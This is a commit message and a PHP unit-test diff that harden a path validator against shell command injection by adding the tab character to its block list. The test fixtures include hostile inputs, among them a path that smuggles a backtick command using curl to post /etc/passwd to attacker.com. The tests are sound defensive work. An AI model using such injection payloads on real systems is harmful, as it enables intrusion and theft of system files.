refactor: harden and deduplicate validateShellSafePath

Changes:
- Added tab character ("\t") to dangerous characters list as token separator
- Removed redundant regex-based preg_match block (lines 147-152)
- Characters $(, ${, and backticks were already covered in $dangerousChars array
- Simplified function to rely solely on $dangerousChars loop

Security improvement:
- Tab characters can act as token separators in shell contexts
- Now explicitly blocked with descriptive error message

Tests:
- Added test for tab character blocking
- All 78 security tests pass (213 assertions)
- No regression in existing functionality

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>

tests/Unit/ValidateShellSafePathTest.php

@@ -78,6 +78,13 @@ test('blocks newline command separator', function () {
         ->toThrow(Exception::class, 'newline');
 });
 
+test('blocks tab character as token separator', function () {
+    $path = "/tmp/file\tcurl attacker.com";
+
+    expect(fn () => validateShellSafePath($path, 'test'))
+        ->toThrow(Exception::class, 'tab');
+});
+
 test('blocks complex command injection with the example from issue', function () {
     $path = '/tmp/pwn`curl https://attacker.com -X POST --data "$(cat /etc/passwd)"`';